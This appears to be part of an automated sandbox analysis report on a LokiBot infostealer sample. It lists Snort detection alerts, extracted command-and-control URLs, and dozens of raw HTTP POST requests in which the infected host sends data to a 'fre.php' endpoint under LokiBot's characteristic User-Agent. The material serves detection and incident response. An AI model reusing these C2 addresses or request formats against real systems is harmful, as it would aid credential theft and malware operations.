                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49884 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49884 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49884 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49884 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49885 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49885 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49885 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49885 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49885 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49887 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49887 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49887 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49887 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49887 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49888 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49888 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49888 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49888 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49888 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49889 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49889 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49889 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49889 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49889 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49890 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49890 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49890 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49890 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49890 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49892 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49892 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49892 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49892 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49892 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49895 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49895 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49895 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49895 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49895 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49896 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49896 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49896 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49896 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49896 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49897 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49897 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49897 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49897 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49897 -> 188.114.96.3:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49898 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49898 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49898 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49898 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49898 -> 188.114.97.3:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 188.114.97.3:80 -> 192.168.2.3:49785
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 188.114.96.3:80 -> 192.168.2.3:49788
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 188.114.97.3:80 -> 192.168.2.3:49797
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 188.114.97.3:80 -> 192.168.2.3:49798
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 188.114.96.3:80 -> 192.168.2.3:49885
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EcIokiggUeWK7stOcHYaTR9Nfu%2Bw1B0KmIgjz5XBrLi5RlXYADH7OvXr%2FdJTFK4ComS7WX9Kl%2BawzsVO2xC9i7YvxqK%2B2HlQKPAZKDJzBamMX%2Fg9bDYXNFLl8qJ2TA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4da52d366927-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
